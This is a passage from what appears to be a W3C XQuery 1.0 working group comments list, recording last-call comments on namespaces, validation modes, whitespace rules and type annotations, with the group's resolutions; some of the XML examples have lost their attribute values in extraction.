a type error is raised.[err:XQ0023]": There are several use cases where people want to put a wrapper around a document (see SQL-2003 SQL/XML and others) and just want to write <a>{fn:doc(...)}</a>. We thus propose, that we allow this scenario by automatically dropping the document node and inserting copies of all the nodes under the document node into the new element. Accepted and closed by adopting the following proposal: Content of element constructors, computed element constructors, and document node constructors no longer raise errors for document nodes - instead, the contents of the document node are copied into the content of the constructed element or document. Accepted and closed by adopting the following proposal: Content of element constructors, computed element constructors, and document node constructors no longer raise errors for document nodes - instead, the contents of the document node are copied into the content of the constructed element or document. Sections 3.7.1.3/3.7.3.1/3.7.3.3 Technical "Copied element nodes are given the type annotation xs:anyType, and copied attribute nodes are given the type annotation xs:anySimpleType. ": assuming no validation is done, the type annotations should be xdt:untyped and xdt:untypedAtomic respectively. Changes earlier resolution MRys: If no validation we get xdt:untyped and xdt:untypedAtomic. AE: In the latest wording this change may have been made. Editors to check wording in 3.7.1.3, 3.7.3.1, 3.7.3.3 and fix. Seems like it is already done. Andrew confirmed. Section 3.7.1.3 Content Technical "Predefined entity references and character references are expanded into their referenced strings, as described in 3.1.1 Literals. Each consecutive sequence of literal characters evaluates to a single text node containing the characters. However, if the sequence consists entirely of boundary whitespace as defined in 3.7.1.4 Whitespace in Element Content and the Prolog does not specify xmlspace = preserve, then no text node is generated.": As in comment MS-XQ-LC1-082, we should not expand whitespace entities before we apply whitespace handling/normalization rules. Also, some of the XML element content whitespace normalization rules are missing. Section 3.7.1.2 Namespace Declaration Attributes Technical Namespace declaration attributes should not affect the in-scope namespace static context for expressions. We think that only the ones in the prolog should affect the namespace prefixes inside expressions. We find the following semantics to be confusing: declare namespace{/b:c}</a> will look for {uri2}:c and not {uri1:c}. "uri2" should only affect the construction part. The same should then also hold for the computed constructors. Thus, we would like to have the following behaviour: Namespace declaration in prolog: Provides static namespace prefix bindings for both constructors and expressions Namespace declaration on construction: Provides static namespace prefix bindings for constructors only, not for embedded expressions. AE: Let's not make things more complex. MRys: Dana said notion of scope is underspecified. PC: This is technical change and there has been some pushback. PC: There is not support for the MS position but better text and example would be good. RESOLVED: Add examples but no change to be behaviour. Section 3.7.1.1 Attributes Technical Replace "The value of the size attribute is "7"" with "The value of the size attribute is xdt:untypedAtomic("7")". In both examples, assuming no validation. > > Status: See Don's request for review: > DC: Made fix to talk about string value and requests that this fix is accepted instead of resolution of MS-XQ-LC1-083 in meeting 175. MR: Can live with this. Don's request is ACCEPTED. > > Status: See Don's request for review: > DC: Made fix to talk about string value and requests that this fix is accepted instead of resolution of MS-XQ-LC1-083 in meeting 175. MR: Can live with this. Don's request is ACCEPTED. MRys: Editorial assuming no validation during attribute construction. RESOLVED: Fix as suggested. Section 3.7.1.1 Attributes Technical "Predefined entity references and character references in the attribute content are expanded into their referenced strings, as described in 3.1.1 Literals. Each consecutive sequence of literal characters in the attribute content is treated as a string containing those characters. Whitespace in attribute content is normalized according to the rules for ""Attribute Value Normalization"" in [XML 1.0] (each whitespace character is replaced by a space (#x20) character.)": Often whitespace in attribute values is entitized to avoid the attribute value normalization. By doing expansion first, we loose this capability and lose the ability to preserve certain whitespace characters. This should be fixed. This has been already REJECTED and publicly announced in WG Resolution: Jonathan to update issues list MRys: By expanding entities early we lose ability to maintain some whitespace characters. PC: Need exact text. MRys: Follow XML 1.0 text or do whitespace normalization first and then expand entity references. AE: In section 3.7.1.1 interchange rules 1 and 2. RESOLVED: Implement AE suggestion above. Attn: Don C. Section 3.2.1.2 Node Tests Editorial Remove reference to namespace node (there is no way to perform a node test on it in XQuery) JR: This has been done. The offending text no longer occurs XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 3.1.6 XQuery Comments "Comments may be used anywhere ignorable whitespace is allowed. See A.2 Lexical structure for the exact lexical states where comments are recognized." In the following queries, a comment is placed where ignorable whitespace would appear to be allowed, but where the A.2.2 machine has no transition on "(:". So which is correct? Does the comment cause a syntax error or not? node( (:test:) ) processing-instruction( xml-stylesheet (:test:) ) element( person (:test:) ) element( hospital / (:test:) staff / person ) <shoe (:test:) <fact>I saw 8 cats.</fact (:test:) > 9 cast (:test:) as hatsize -Michael Dyck Proposal accepted. XQuery: specification unclear Section: 3.7.1.2 paragraph two says: "A namespace declaration attribute is used inside a direct element constructor, and serves to add a namespace to the in-scope namespaces for the constructed element, or to specify the default element/type namespace within the scope of the constructed element." What does it mean "within the scope of the constructed element"? Does the scope refer to the XML forest rooted at the given element constructor or the XQuery expressions that are lexically placed within the "{" and the "}" ? Or both ? This a very important point and the notion of "scope" is too fuzzy. Status: Related to several other comments on namespaces: FEB0210, FEB0211, FEB0207 and Microsoft LC-128. AE: Section 3.7.1.2 explains this better now. PC: Thus, Dana's problem has been fixed by this new text. No further action required. XQuery: syntax simplification request Why is the Expr optional on the production [105] ? If the expression is not present the entire text constructor returns the empty sequence, so why support this syntax ? Adapt the proposal Dana: why does the comp text constructor have an optional expr as opposed to comment constructor etc. where expr is mandatory. ADOPTED. XQuery: incomplete specification Section 3.7.1 and 3.7.3 discuss the base-uri property of the new nodes but does not say what should happen when the static context has no base uri defined. Don showed that the question asked in this comment is addressed in the XQuery spec, section 3.7.1.3, Content, rule 5.b, and section 3.7.3.1, Computed Element Constructors, rule 4.b, answers this question. The comment was probably valid in the Last Call Working Draft, but it has been resolved in the current Working Draft. RESOLUTION: Comment qt-2004Feb0453-01/BEA_028 is resolved with no changes to the document. XQuery: (potentially) editorial Section 3.1.5 (Function calls) when it describes the function conversion rules, it says that in case of a function invocation from a different module the type test has to be true in both modules. This is surprising. Does this mean that we are allowed to write in a library module: define function f($x as ns:shoeSize?) (: ns:shoeSize derives from xs:integer here :) {()} while the importing module contains: declare external variable $y as ns:shoeSize?; (: ns:shoeSize derives from String here :) f($y) and have the call f($y) succeed if $y is bound to the empty sequence ? This is surprising. Did I misunderstand something? Is this is not allowed, where is the text that forbids this case?(maybe) See Add the constraint: For every definition found in the in-scope schema definitions (ISSD) of a module resource, if it is found in another module resource used in the same query, then its definition must be the same as its definition in the other module resource. Scribe note: The mail says "module" but the term was changed to "module resource" by another decision made at this meeting. The Editor can reword this. XQuery: incomplete specification, request for clarification The XQuery specification does not seem to require that all the in-scope schema definitions that are referred in a variable type declaration or a function signature of an imported library module have to also be in scope in the importing module. Moreover, the XQuery specification does seem to impose any consistency constraints between in scope schema definitions in the static context of a main module that imports a library module and the in scope schema definitions with the same names in the library module. Both should be required as consistency constraints, and stated in section 2.2.5. subsumed by qt-2004Feb0448-01 partly answered by an existing constraint, and also the new constraint added for qt-2004Feb0448-01. I don't see the need for this 'local' namespace. Why was it introduced? Regards, Martin. It's to permit users wanting to define functions not to need to declare a namespace. ACTION A-CHINOOK-15: Jonathan Robie to reply.. Agreed: A document node constructor is the only way to create a document. Agreed: Within XQuery, document nodes are not created implicitly. Serialization does implicitly convert to a document. Agreed: Our data model needs the flexibility to be able to create documents with multiple root nodes. ACTION A-173-07: Jonathan to respond to Martin. Decided: The issue is resolved. Rule [17], EscapeQuot, should say /* ws: significant */, I guess. Regards, Martin. Proposal accepted. . We now have an appendix about application/xquery. RESOLVED: qt-2004Feb0415-02 closed ACTION A-216-09 Liam will reply to qt-2004Feb0415-02 [done] [3] 3.1.1 Literals, entity/character references: After careful examination, this works out. But it would be good to have a section explaining how character escaping works in XQuery overall, including differences and similarities to XML and XPath. This comment asks for an overview, the comment is therefore editorial. DC: we enumerate the different cases and give the syntax, it's hard to see what else we should do. RESOLVED: we feel the spec is unambiguous, we don't feel a need to add further tutorial information at this stage. AE will respond to Martin. Issue closed with no action. [4] The special conventions for escaping quotes (production [17]), apostrophes ([25]), and curly braces (should probably also be a production of its own) may not be necessary. Character references should be used, for convenience, named character references for { and } could be defined. R: Martin isn't claiming there's anything broken by the current mechanism, but that we could just use character references AE: we did have a reason for doing what we did: MKay had argued that XPath expressions inside XSLT are going to be processed first in XML and then by the XPath processor JR: I can't see making a change like this at this point JM: I'm hearing consensus to respond saying we did this for good reason and see no good reason to change. . > qt-2004Feb0415-06 [XQuery] I18N last call comments This (qt-2004Feb0415-06) was RESOLVED at the redmond F2F and meeting 199. ) DC: I believe we have already processed this issue, or something like it. The current rules for whitespace in attribute constructors reflect the intent of what is requested. JR: appears to be a duplicate of Feb0490-01 (MRys comment). RESOLVED. Duplicate of Feb0490-01, which we accepted. Jonathan will respond to this effect. [8] 3.7.1.3 Content (and other places): serializing atomic values by inserting spaces may not be appropriate for Chinese, Japanese, Thai,..., i.e. languages that don't use spaces between words. This has to be checked very carefully. JR had some email interchange with Martin Duerst, about spaces separating tokens in programming languages not being the same as in natural languages. The reason the white space is there for roundtripping sequences. [9] There should be more non-US examples. For example, it is very difficult for somebody not from the US to understand why there are no Deep Sea Fishermen in Nebraska. DECISION: To not ask the editors to make changes solely for the purposes of this comment, but to do so on an opportunistic basis only. We've asked the editors to consider rephrasing examples in non-US terms when they have the opportunity, but there are no plans to make revisions unless we learn of examples that are particularly unclear. [10] 3.7.2: Not requiring CDATA constructs to be serialized as CDATA sections is a good idea, because it helps dispell the idea that CDATA sections are semantically significant. overtaken by events, we no longer have CDATA sections in the data model. [11] 3.7.3.1, example using 'lang' attribute: Please replace this attribute with xml:lang, and its values with 'de' and 'it'. JR: he's right in both cases, this example should be changed DECISION: To adopt the change proposed in the comment. ACTION A-216-03 Don to make the change and reply to qt-2004Feb0415-11 RESOLVED: qt-2004Feb0415-11 accepted [12] 3.7.3.4: Why is there a need for a 'text' node constructor. What's the difference between this and a string (there should be none, or as few as possible). > h) qt-2004Feb0415-12 [XQuery] I18N last call comments JR: one thing that's very hard to do is to create an untyped string - you have to know the name xdt:untypeAtomic, but this turns out to be common. We have constructors for all of our node types. DECISION: That no change is required to the documents in response to this comment. RESOLVED: qt-2004Feb0415-12 closed with no change ACTION A-216-04 JR to respond to qt-2004Feb0415-12 . [PC] Latest message is under: This proposes a new grammar for URILiteral. [MichaelK] Is that needed in XPath? [ScottB] I believe this is used in one place. *** Proposal to add a URILiteral in the grammar is adopted. *** This resolves Issue qt-2004Feb0415-13. LIAM to respond to I18N working group. [14] 3.8.3, last example: Instead of 'collation "eng-us"', something that looks more like an URI should be used. DECISION: To make a change based on the comment. ACTION A-216-06 Don will fix, using, and respond to the comment RESOLVED: qt-2004Feb0415-14 accepted [15] 3.12.2 Typeswitch: There should be an example that shows how to deal with strings, complex types without any actual markup contained, and complex types with markup (e.g. <ruby> or similar). Don: we have one example in typeswitch, using the type of an address element. DECISION: No support for making a change -- the language book is not a tutorial. RESOLVED qt-2004Feb0415-15 rejected . we won't put this in the prolog; in general, we won't put serialization para's in the prolog (leave it implementation-defined/API-defined) ACTION A-208-03: MRys will write a proposed reply for qt-2004Feb0415-16, and then SteveB will review it and send it to Martin [17] Note at the end of 4.6: re. DTD treatment, this should very clearly say what happens (or doesn't happen) with entities, or point to the place where this is defined (data model)? The comment is: [17] Note at the end of 4.6: re. DTD treatment, this should very clearly say what happens (or doesn't happen) with entities, or point to the place where this is defined (data model)? Andrew: this was at the end of the schema import section; the note at the end of the section talked about DTD-validated documents, suggesting converting DTDs to W3C XML Schemas. In our latest document that note no longer exists. The XQuery language document no longer mentions DTD. The data model 3.2 says, "All general and external parsed entities must be fully expanded" which answers this comment. RESOLVED: qt-2004Feb0415-17 closed Liam to reply (done). [18] it would be very good if it were possible to declare default collations for part of an XQuery. MaryH: I don't see any good way to do this. AE: we've chosen to provide prologue directives and not to provide expresion-by-expression directives Liam: this wouldhave implications on separate compilation of modules, if you could say, with default collation foo cal function module:x Maybe in a later version. DECISION: No changes to the language (at least in V1.0) in response to this comment RESOLVED: qt-2004Feb0415-18 rejected [19] There should be a way to character normalize nodes (not only strings). This could easily be achieved by overloading fn:normalize-unicode. This will help in cases where otherwise fn:normalize-unicode would have to be used all over the place. Serialization parameters are more appropriate for this. JR will respond. [20] The XML version for output seems to be fixed to 1.0. There needs to be a way to output XML 1.1. (how to output XML 1.1?) JR: the supported version of XML is now implementation defined, (decided on August 11th telecon) JR will respond to Martin. It is not too difficult to predict that typing will be a headache for many people for XQuery and XSLT2. Please do anything and everything that you can to reduce the problems. The different concepts around types, the different types, the different rules for conversion,... will make typing very difficult to use. It would be very good to have some section (maybe an appendix) summarizing all the rules, and giving people a chance to get an overall grasp. Giving parallels e.g. to well-known programming languages (if and where they exist) may also help. Another issue is that it is not completely predictable, and not completely interoperable, which XML Schemas will be taken into account and which not. XQuery Schema Import does a lot to make this more predictable, but this should be completely predictable. 'augmentable by implementation' does not lead to interoperability. A typical example of this is the "implementation-dependent mechanism for determining whether an unknown type is compatible..." in 2.4.4 of XPath. Regards, Martin. Yes, typing is a headache. We are doing what we can to make it easier, but it is hard to understand, and involves difficult concepts. We expect books and articles to clarify this, our spec needs to be clear, but it will not be a tutorial. Implicit schema import is needed in some environments that need type safety but do not support explicit schema import. It is always possible to explicitly import schemas for interoperability. Implementations that can access dynamic type information should be allowed to use this information even though purely static implementations can not. This is why we have chosen to allow an implementation-defined mechanism that can utilize type hierarchies not available in the static context. For many applications, namespace node preservation is overweight. For others, it is needed. The current definition of XQuery can easily result in large numbers of superfluous namespace nodes, especially when querying documents that use several namespaces. Consider the following data, taken from the DOM Issues List: <issues xmlns: <header> <title>DOM Level 3 Core Issues List</title> <!-- SNIP --> </header> </issues> Now consider the following query, applied to this data: <out> { doc("dom-issues.xml")/issues/header/title } </out> Here is the result, according to our current spec: <out> <title xmlns:DOM Level 3 Core Issues List</title> </out> Although none of these namespaces are actually used in the title element that was retrieved, our current specification require that all namespaces in scope in the original document must be in scope for the copied element in the constructed element. Now suppose that we create several namespace-decorated documents like this one, and perform an XQuery that copies from each of these to create a new document with even more namespaces... Naturally, we do need to ensure that namespaces are preserved if they are used in element names, attribute names, or QNames. Consider the following query: doc("dom-issues.xml")/issues//originator The result must preserve the above-mentioned namespaces to allow correct interpretation: <originator xlink:type='simple' xmlns:Christopher Aillon</originator> There are also XML vocabularies, such as XML Schema or XSLT, that use QNames in content, and for these, all QNames really must be preserved. I think we should provide two modes of operation: 1. Namespace preserving copy keeps all namespace nodes 2. Normal copy keeps only namespace nodes used in element names, attribute names, or instances of xs:QName. One possibility would be to declare this at a global level: declare namespace-preserving = "true"; Another possibility would be to declare namespace preservation for specific namespaces: declare namespace-preserving = "", ""; Either of these would reduce the overhead associated with copying elements significantly in some implementation environments. Jonathan RESOLUTION: This resolves qt-2004Feb0285-01 [XQuery] 3.7.4 Namespace nodes on constructed elements The comment came from Jonathan, so no need to respond. (IBM-XQ-015) XQuery currently defines three validation modes: strict, lax, and skip, based on the three validation modes of XML Schema. In skip mode, no validation is applied to a newly-constructed element. Instead, the new element node (and each of its descendant elements) is given the annotation xdt:untyped, and its attributes (and the attributes of its descendants) are given the annotation xdt:untypedAtomic. If the content of the new element is copied from existing nodes, the types of these existing nodes are lost. An XQuery implementation that does not support Schema Import will probably run in skip-validation mode, since validation is meaningful only if a schema is present. Nevertheless, such an implementation may wish to preserve the type annotations on nodes in input documents, since these type annotations may affect the processing of a query (for example, 17 > 5 is true for the xs:decimal type but not for the xdt:untypedAtomic type). The loss of type information during skip validation causes a serious problem for applications that need to "wrap" an element in a higher-level "envelope" element. The wrapping is done by referencing the "content" element inside a constructor for the "envelope" element, causing the content element to be copied and validated. It is quite possible that the "content" element may not be defined in the in-scope element declarations. This may happen if the current application is a generic message-routing application that does not find it practical to import the schemas for all possible contents. It will also happen in systems that do not implement the Schema Import feature. In these cases, skip-validation causes the loss of the type information on the "content" element. Here are some examples of this problem (assuming skip validation in each case): (a) Copy a set of "customer" elements into newly-constructed "rated-customer" elements, pairing each customer with a rating. Now order all the rated-customers by balance-due. Balance-due was originally decimal, but now its type has been lost and 5 is sorted as greater than 17. (b) Write an application to extract data from an XML document and wrap it in <row> and <col> tags for interfacing to a relational database. By wrapping the data in <row> and <col> tags, its original types are destroyed and all the data appears to be text. Again, data that was originally decimal will be sorted incorrectly. (c) If a query-rewrite pushes a predicate inside a constructor, the effect of the predicate is changed because the expression inside the constructor is typed but outside the constructor it is not. This limits the ability of the system to do query optimization and to merge queries with view definitions. The solution to these problems is to introduce a new validation mode called "skip preserve", or simply "preserve". In this mode, no validation is attempted, and the type annotation of the subject element remains unchanged rather than being set to xdt:untyped. Adding this validation mode would not affect the definitions of the existing three modes. The following changes would be made to the XQuery specification by this proposal: (a) In Section 2.1.1, Static Context: In definition of Validation Mode, add "preserve" or "skip preserve" to the list of modes. (b) In the grammar production for ValidationMode, add the a keyword for the new option. (c) In Section 3.7.1.3, Direct Element Constructors--Content: Rule (1d) should be changed as follows: "If the validation mode is "preserve", copied element and attribute nodes retain their original type annotations; otherwise, copied element nodes are given the type annotation xdt:untyped, and copied attribute nodes are given the type annotation xdt:untypedAtomic." (d) In Section 3.7.1.5, Direct Element Constructors--Type of a Constructed Element: Add the following initial sentence: "A direct element constructor assigns the initial type annotation xdt:untyped to the newly constructed element node. It then validates the new node, using the schema validation process defined in XML Schema." Also in Section 3.7.1.5, change the first bullet as follows: "If validation mode = skip or preserve, no validation is attempted. The constructed element retains its type annotation of xdt:untyped, and its attributes and descendants retain the type annotations assigned to them during construction." (e) In Section 3.14, Validate Expressions: Add the following bullet to the three bullets that define strict, lax, and skip validation: "preserve indicates that no validation is to be attempted, but that element nodes and attribute nodes are to retain their original type annotations." (f) In Section 4.6, Validation Declaration: Add "preserve" to the list of validation modes. Note that these changes will align XQuery with XSLT 2.0, which has already introduced the concept validation="preserve" as documented in. The XSLT 2.0 definition of validation="preserve" is consistent with the definition above, and these definitions should be kept consistent. --Don Chamberlin (IBM-XQ-011) Section 3.14 (Validate Expression) states that validating a node destroys its identity. I believe that this issue needs more thought. The reason for giving a new identity to a validated node is that some of its contents may change (for example, default attributes may appear). But consider the following: (a) The validated note has the same parent as the original node, right? Doesn't this mean that the content of the parent node has changed? If the parent node can retain its identity, why can't the validated node retain its identity? . (c) Requiring validation to generate new node identities also raises questions about Requirement (3.4.13) that queries must be able to preserve the identity of items in the Data Model. (d) Requiring validation to generate new node identities also may place an unnecessary burden on implementations that perform incremental validation on the data model rather than serializing it and revalidating the whole tree from scratch. (e) Suppose $n is bound to an element node. Is "$n is validate{$n}" true? Is "$n/.. is validate{$n}/.." true? If the answers are not the same, why not? --Don Chamberlin Dana: This would add side effects to the language. XQuery would no longer be a functional language. None of the traditional optimizations would hold. Answers to Don's questions: (a) The validated note has the same parent as the original node, right? Doesn't this mean that the content of the parent node has changed? If the parent node can retain its identity, why can't the validated node retain its identity? Agreed: If a node is validated, it no longer has a parent. . Agreed: In-place validation, which is needed for updates, is different from the validation XQuery currently does. (c) Requiring validation to generate new node identities also raises questions about Requirement (3.4.13) that queries must be able to preserve the identity of items in the Data Model. Agreed: There is no requirement that every operation in XQuery preserve identity, merely that it is possible for a query to return nodes, preserving identity. (d) Requiring validation to generate new node identities also may place an unnecessary burden on implementations that perform incremental validation on the data model rather than serializing it and revalidating the whole tree from scratch. Agreed: There are ways to do this under the covers. (e) Suppose $n is bound to an element node. Is "$n is validate{$n}" true? Is "$n/.. is validate{$n}/.." true? If the answers are not the same, why not? Agreed: We can live with the status quo on this. Some disagreement with what that answer is. Jonathan believes the answers are "false" and "()", respectively. (IBM-XQ-009) Section 3.7.1.5 (Type of a Constructed Element) uses the following example: <a xsi:47</a> But Section 3.7.4 (Namespace Nodes on Constructed Elements) says that a similar example is not valid: <p xsi:3</p> This illustrates an error that many users will make. The namespace "xs" that contains all the built-in schema types is not in scope for a constructed element unless it is explicitly declared. We need to correct the inconsistency between the two sections noted above. This can be done in either of the following ways: (a) We can make a rule that the "xs" namespace, like the "xml" namespace, is automatically in scope for all constructed elements. I recommend this approach, because I believe that the justification for "xs" is at least as good as for "xml". This will remove a common source of errors and frustration. (b) We can replace the example in Section 3.7.1.5 with the following ugly but correct example: <a xmlns:xs="" xsi:type="xs:integer>47</a> (along with an embarrassing explanation about why it this is necessary and an apology to users). --Don Chamberlin Rationale: you can declare the prefix/URI binding in the instance Rationale: you can declare the prefix/URI binding in the instance Option B is preferred. Don will respond to himself. (IBM-XQ-008) Section 3.5.1 (Value Comparisons): Value comparisons were intended to be transitive, but there is a case in which they are not. Suppose that A and C are values of type int (32 bits of precision) that differ in their low-order bit. Suppose that B is the value of type float (24 bits of precision) into which both A and C are converted by the rules for casting int to float. Then "A eq B" is true and "B eq C" is true, but "A eq C" is false. The language documents should state that the value comparison operators are transitive except in cases where precision is lost in type-casting of operands. --Don Chamberlin Don: problem is. value comparisons are still not transitive due to precision problems during conversion. Michael R. has a counter proposal (to get rid of transitivity altogether). Don elaborates on the actual problem. ADOPTED. Don will respond by elaborating on the corner case. (IBM-XQ-006) Section 3.1.5 (Function Calls): This section states that a function does not inherit a focus (in other words, the context item, context position, and context length are initially undefined inside the body of a function). The section should also say something about the other parts of the static and dynamic context. Are these inherited from the module in which the function is defined (as opposed to the calling module)? Are there any consistency rules between the contexts of the defining and calling modules? For example, can they have different default collations or default namespaces? Must their current date/time and implicit timezones be consistent? Can a variable that is assigned a value in the calling module be seen inside a function body? Can a document that is in the available documents of the calling module be seen inside a function body? --Don Chamberlin [[ Discussion from meeting 168 on 2004-02-18: Don: where does the context of a function call come from? From the declaration context or from the calling context? Dana: mentions that BA also has sent a couple of comments on this issue. Michael R.: suggest to remove this(?) (modules?) from the required features. Don doesnt think that modules aren't so badly broken that they need to be given up. Suggests to put this issue on the F2F agenda. ]] (IBM-XQ-005) Section 2.6.3 (Full Axis Feature): The phrase "raises a static error" should be changed to "may raise a static error", to denote that an implementation may selectively implement some of the reverse axes of XPath even though it does not claim to support the Full Axis Feature. --Don Chamberlin Don: wishes to have a continuum between only downward axes and full axes. This could be resolved by changing a MAY to a MUST. MRys: agrees, and wants to generalize it to all optional features. Peter F is in favor, if unsupported axes still raise a static error. Massimo also wants to make sure that too. ADOPTED. Don C. will respond accordingly. The XQuery document notes that the following element constructor fails with a validation error: <p xsi:3</p> This is an unpleasant surprise for users - and there is a simple solution. The specification already requires implementations to create a namespace node for each namespace used in an element or attribute name: A namespace node is created corresponding to each namespace declared in a namespace declaration attribute of this (or any enclosing) direct element constructor, each computed namespace within this (or any enclosing) computed element constructor, and the xml namespace. These namespace nodes use the same prefixes and URIs as the namespace declarations from which they are derived (the prefix becomes the name of the namespace node, and the URI becomes the string value of the namespace node). A namespace node is created corresponding to any namespace used in the name of the element or in the names of its attributes. However, a namespace node need not be created if there is already a namespace node for a given namespace URI on a given element. The string value of the created namespace node is the namespace URI of the element or attribute name. The name of the namespace node (which represents the namespace prefix) is implementation-dependent; it must not conflict with the name of any other namespace node for the same element. A similar rule should be added to create a namespace node for each namespace used in an instance of the xs:QName type. Jonathan Rationale: you can declare the prefix/URI binding in the instance Rationale: you can declare the prefix/URI binding in the instance XQuery 1.0: An XML Query Language W3C Working Draft 12 November 2003 A.2.1 White Space Rules You should probably define what you mean by "white space", since it isn't defined in the EBNF. "White space is tolerated before the first token and after the last token." The word "tolerated" is odd here. Perhaps change to "allowed". At the end of the sentence, append "of a module". "White space is optional between terminals, except a few cases where white space is needed" You must specify which cases. Also, after "except", I think you need to insert "for" or "in". "to disambiguate the token." This is a misuse of the term "disambiguate" in its technical sense. Ambiguity (or the lack thereof) is a property of a grammar. Change "token" to "grammar". ------------------------------------ "Special white space notation is specified with the EBNF productions, when it is different from the default rules," It's not clear what the default rules are. I think they started at "White space is optional". I believe it would increase clarity if you created a "Whitespace: default" subsection, and put the "default rules" under it. "'ws: significant' means that white space is significant as value content." As I understand it, this has nothing to do with specifying where white space is allowed: you could replace every "ws: significant" with "ws: explicit" and the set of legal queries would be the same. Specifying what is "significant as value content" is out of place here. (For instance, whether boundary whitespace is significant is controlled by the xmlspace declaration.) I don't think the white space rules are precise enough to tell me whether white space is allowed/disallowed/required between two terminals that are derived from productions with different ws annotations (e.g., one "ws: explicit", one default). ------------------------------------ "For XQuery," Delete. "White space is not freely allowed in the non-computed Constructor productions, but is specified explicitly in the grammar ..." Change "non-computed" to "direct". This sentence is unnecessary, since the corresponding productions have the appropriate "ws" annotations. (It's a holdover from the days before "ws" annotations.) "The lexical states where white space must have explicit specification are as follows: ..." If you're talking about the states that have an explicit transition on white space (or on a symbol that can derive a whitespace character), then: --- The use of "must" is inappropriate, since it's not the implementor's job to ensure that you specify these transitions. --- Why is PROCESSING_INSTRUCTION included in the list? --- Why is EXPR_COMMENT excluded? If you're talking about something else, does it affect the interpretation of A.2.2? In either case, the sentence should probably be moved to A.2.2, or else deleted. ------------------------------------ "For other usage of white space," Other than what? Aren't all uses of white space covered by either "the default rules", "ws: explicit", or "ws: significant"? "one or more white space characters are required to separate 'words'." What constitute "words"? "Zero or more white space characters may optionally be used" Given "zero or more", "optionally" is redundant. "around punctuation and non-word symbols." What constitues "punctuation"? or "non-word symbols"? In sum, this paragraph is vague and unhelpful, and could probably be construed to conflict with other requirements. Either delete it or make it more precise and better related to the rest of the section. ------------------------------------ Presumably, white space is disallowed anywhere that this section doesn't say it *is* allowed. (If that's the case, it would probably be good to mention it.) In particular, it would appear that white space is disallowed *within* terminals (or at least, those that are derived from a production without a "ws" annotation). Normally, this is sensible, but it has some odd (and probably unintended) consequences: --- Because SchemaGlobalTypeName is a terminal, constructs such as type( schedule ) or type (schedule) are illegal. --- Because Pragma and MUExtension are terminals, the spaces that appear around "pragma" and "extension" in the spec's examples of these constructs are illegal. --- All four "ws: explicit" annotations in the "Named Terminals" section are redundant. There are various ways to deal with these cases, but I think the root of the problem is defining the allowed locations for white space in terms of "terminals" (or "tokens"), which I think is unnecessary. ------------------------------------------------------------------------ The spec is inconsistent: "white space" or "whitespace"? ------------------------------------------------------------------------ Also, the following sections: 2.6.5 Pragmas 2.6.6 Must-Understand Extensions 3.1.6 XQuery Comments A.1.1 Grammar Notes (grammar-note: comments) E Glossary (must understand) all refer to "ignorable whitespace", but this term is never defined. -Michael Dyck Proposal accepted.. Section 3.7.3.3 of the XQuery specification says that for document constructors, "No schema validation is performed on the constructed document." This seems inconsistent with implicit validation of elements. Consider the following element constructor. <person> { $that/name, $that/address, $that/shoesize } </person> If the person element is in the ISSD, this is validated. Now observe what happens if this element is placed in a document node. document { <person> { $that/name, $that/address, $that/shoesize } </person> } Under the current language definition, the <person> element would be validated by its own constructor, and an error would be raised if validation fails. Then the validated <person> element would be copied under a new document node and its type annotation would be changed to xdt:untyped. If element constructors are implicitly validated, users will expect elements in document nodes to be valid. Two possibilities seem reasonable: 1. Copy the content directly to the document node constructor, preserving the types of child elements. This is simpler, but does not enforce identity constraints. 2. Copy the content directly to the document node constructor, preserving the types of child elements, then apply identity constraints to the document. This adds complexity, but ensures that the resulting document is schema valid. The status quo does not seem reasonable. Jonathan Already resolved in prior meetings. > Status: This comment was identified at the F2F as being related to > the typed value decision. Agreed: this is actually a separate issue. Proposal: Copy the content directly to the document node constructor, preserving the types of child elements. This is simpler, but does not enforce identity constraints. There is no implicit validation for document nodes. Decided: The above proposal is adopted. The issue is resolved via this proposal. "2.6.6.1 XQuery Flagger" says: "If the XQuery Flagger is enabled, a static error [err:XQ0015] is raised if the query contains a must-understand extension." This implies that the XQuery Flagger must be available in the static context. Jonathan Andrew: This doesn't change behavior - it could be treated editorially. It simply asks for a way to record whether the flagger is on in the static context. Proposal: The default predefined value for the XQuery flagger and XQuery static flagger are set by the host environment in an implementation defined way. They may not be augmented by an implementation or in a query. They are available for both static analysis and dynamic evaluation (this is already true). Decided: The above proposal is adopted. The above issue is resolved via this proposal. Note: This is related to Jan0203, which is still open and was discussed in meeting 167. Forwarding Proposal: > 1. Is it a violation of the spec to put the xml declaration prolog in an > XQuery expression as the example in the original e-mail below ? Yes, it should be flagged as an illegal PI by the data model (because of). The Data model spec should make this explicit. > 2. If it is a violation of the spec, what should an XQuery parser do > when it sees it ? Adding such a PI to the data model should be flagged as an error. The Data model spec should make this explicit. > 3. Since the XQuery document constructor is defined as: <snip/> > So, is it a violation of the spec if I write the following XQuery > expression on an XQuery implementation that does not automatically add > the XML declaration to a document node ? > document > { > <?xml version='1.0'?> > <x> > My Query result > </x> > } Yes, only because the above is an illegal PI. Resolved. Prohibit this in the DM, and it will be reflected in the "constructor location". The following issue was identified during formal definition of SequenceType matching. Resolution of this issue is necessary to complete closure of Issue 559 (New Sequence Type needs to be fully implemented in Formal Semantics). Current status: 1. The XQuery type system is based on XML Schema. 2. Section 2.4.4.3 Matching an ElementTest and an Element Node, point 2 states that: a. element(ElementName, TypeName) matches a given element node if the name of the element node matches ElementName or matches the name of an element in a substitution group headed by an element with the name ElementName [if such a head element exists] b. type-matches(TypeName, AT) is true, where AT is the type of the given element node. 3. To express a sequence type in the XQuery type system, it should correspond to some valid XML Schema structure. In XML Schema terminology, the sequence type syntax element(ElementName,TypeName) represents a new local element ElementName in the substitution group of a global element with the *same* ElementName, and with type TypeName. In XML Schema, you might express this sequence type as: <xs:element Problem 1: XML Schema requires that all members of a substitution group be globally declared, therefore the above XML Schema type is invalid and thus there is no valid XQuery type expression that represents the sequence type element(ElementName, TypeName). Problem 2: Even if we permitted such a type in the XQuery type system, another problem arises. XML Schema (and hence the XQuery type system) requires the type name of a substitution group member to be derived from the type name of the head of the substitution group. This constraint is not enforced by sequence-type matching, and therefore it is out of the scope of XML Schema and our type system. Because the current semantics of element(ElementName, TypeName) cannot be expressed in the XQuery type system, any example based on it is potentially unsound. To illustrate, consider the following XML Schema structures: An element person of type Person: define element person of type Person define type Person { element manager of type xs:string, } A type Company: define type Company { element ticker of type xs:string } and consider the sequence type: element(person, Company) There is no corresponding XML Schema or XQuery type for this sequence type, i.e., the following is invalid, because type Company is _not_ derived from type Person: <xs:element Consequence: we do not know how to map this sequence type into the XQuery type system and therefore cannot provide a static semantics for it. Possible solution 1: enforce the XML Schema's type-derivation 